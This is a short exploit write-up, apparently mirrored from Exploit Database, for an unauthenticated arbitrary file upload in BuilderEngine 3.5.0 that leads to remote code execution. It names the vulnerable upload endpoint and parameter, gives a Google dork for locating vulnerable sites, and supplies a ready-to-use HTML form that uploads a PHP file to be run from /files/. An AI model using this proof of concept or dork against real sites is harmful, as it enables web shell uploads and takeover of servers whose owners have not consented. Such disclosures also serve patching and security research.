BuilderEngine 3.5.0 – Arbitrary File Upload

• Exploit Database
• 111 阅读

• 作者： metanubix
  日期： 2016-09-19
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/40390/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28

  <!-- # Exploit Title: BuilderEngine 3.5.0 Remote Code Execution via elFinder 2.0 # Date: 18/09/2016 # Exploit Author: metanubix # Vendor Homepage: http://builderengine.org/ # Software Link: http://builderengine.org/page-cms-download.html # Version: 3.5.0 # Tested on: Kali Linux 2.0 64 bit # Google Dork: intext:"BuilderEngine Ltd. All Right Reserved"   1) Unauthenticated Unrestricted File Upload:   POST /themes/dashboard/assets/plugins/jquery-file-upload/server/php/   Vulnerable Parameter: files[]   We can upload test.php and reach the file via the following link: /files/test.php --> <html> <body> <form method="post" action="http://localhost/themes/dashboard/assets/plugins/jquery-file-upload/server/php/" enctype="multipart/form-data"> <input type="file" name="files[]" /> <input type="submit" value="send" /> </form> </body> </html>